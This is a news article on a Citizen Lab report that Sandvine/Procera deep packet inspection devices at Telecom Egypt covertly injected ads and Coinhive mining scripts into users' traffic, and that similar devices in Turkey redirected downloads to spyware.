Report Shows Egypt is Covertly Mining Cryptocurrency on Citizens’ Computers
The Egyptian government has been called out in a new report that suggests they are not only spying on and censoring their citizens’ internet but also using them to mine cryptocurrency.
Government Mining Cryptocurrency Covertly
The Citizen Lab, an interdisciplinary laboratory at the University of Toronto, published a report on Friday strongly suggesting that Egypt has been mining cryptocurrency secretly on its citizens’ computers. The report explained that Sandvine/Procera Networks Deep Packet Inspection (DPI) devices were used “to covertly raise money through affiliate ads and cryptocurrency mining in Egypt.”
Sandvine Corporation was acquired in September of last year by private equity firm Francisco Partners, which bought Procera Networks in 2015. Sandvine and Procera Networks then merged and have been producing a website-filtering software called Packetlogic which the report says “may have been used by government-linked entities in both Turkey and Egypt to inject spyware.”
In addition, the Lab also found that the software is installing at least one cryptocurrency mining script, Coinhive, which is readily available for mining the privacy-centric cryptocurrency monero (XMR).
Through a process that began with scanning all of the IP addresses in certain countries, the researchers found DPI devices called middleboxes that intercept traffic on Turk Telekom’s network between the public and various unencrypted websites.
These devices were “used to redirect hundreds of users in Turkey and Syria to nation-state spyware when those users attempted to download certain legitimate Windows applications,” the researchers elaborated. In Egypt, the team found more than just spyware, stating:
We found similar middleboxes at a Telecom Egypt demarcation point. The middleboxes were being used to redirect users across dozens of ISPs to affiliate ads and browser cryptocurrency mining scripts.
Installing Mining Scripts
Telecom Egypt is the country’s primary telephone company with a fixed line subscriber base of over 6 million. It is 80% owned by the Egyptian Ministry of Communications and Information Technology.
The researchers named the Egyptian revenue-generation scheme “Adhose”. The report explained that Adhose has two modes: the spray mode and the trickle mode. The former “redirects Egyptian Internet users en masse to ads or cryptocurrency mining scripts whenever they make a request to any website” and the latter “targets some jаvascript resources and defunct websites for ad injection.” The report revealed that the scheme has been running by the same entity “since at least October 2016.”
While scanning a group of 5,702 IP addresses in January that belonged to 4 of the 17 ASNs present in Egypt, the team concluded:
Of these 5,702 IPs, 5,443 in four ASNs returned the advertising redirect, for an injection rate of ~95%.
The Citizen Lab sent letters to Sandvine and Francisco Partners summarizing their findings in February. In its reply, Sandvine claims that the report is “false, misleading, and wrong.” However, the lab says, “We emphasized that we were confident in our research findings, which two independent peer reviews confirmed.”